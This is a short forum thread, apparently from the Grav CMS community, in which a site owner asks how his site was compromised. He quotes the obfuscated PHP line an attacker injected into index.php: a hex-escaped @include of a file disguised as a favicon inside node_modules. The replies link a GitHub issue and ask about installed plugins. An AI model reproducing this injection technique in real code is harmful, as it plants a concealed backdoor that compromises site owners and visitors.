Community guidelines

Please keep discussions civil and on-topic. Repeated violations may lead to a temporary ban.

General

Grav itself or Admin plugin has security issues?

Started by Alexander Kim 8 years ago · 2 replies · 925 views

8 years ago

Today i've noticed, that someone hijacked my Grav site on a VPS (none of other sites was affected, just Grav). I found they've added this code to my root index.php:

TXT

/*07cd0*/

@include "\x2fs\x72v\x2fw\x77w\x2fs\x65r\x6be\x6fr\x67/\x2fn\x6fd\x65_\x6do\x64u\x6ce\x73/\x70a\x74h\x2dr\x6fo\x74-\x72e\x67e\x78/\x66a\x76i\x63o\x6e_\x63e\x615\x656\x2ei\x63o";

/*07cd0*/

How is that possible? I've set correct permissions on files and dirs. Admin plugin has its flaws?

Dimitri Longo ModSquad Team Member

Grav Forum Moderators Regular First Post Conversation Starter Well Liked 119 posts

8 years ago

Discussion on Github here
https://github.com/getgrav/grav/issues/1985#issuecomment-382633732

8 years ago

What plugins did you have installed in Admin?

Suggested topics

Topic	Replies	Views	Activity
Well done Grav Team General · by Jerry Hunt, 4 days ago	2	80	10 hours ago
Grav 2, Admin Next, API and Migrate are now in production! General · by pamtbaau, 15 hours ago	1	51	15 hours ago
Welcome to the new Grav Forums! General · by Andy Miller, 1 day ago	0	45	1 day ago
How active is Grav? General · by Marcel, 12 months ago	6	346	5 days ago
Contents in bin folder delete itself during core updates General · by Duc , 5 days ago	3	40	5 days ago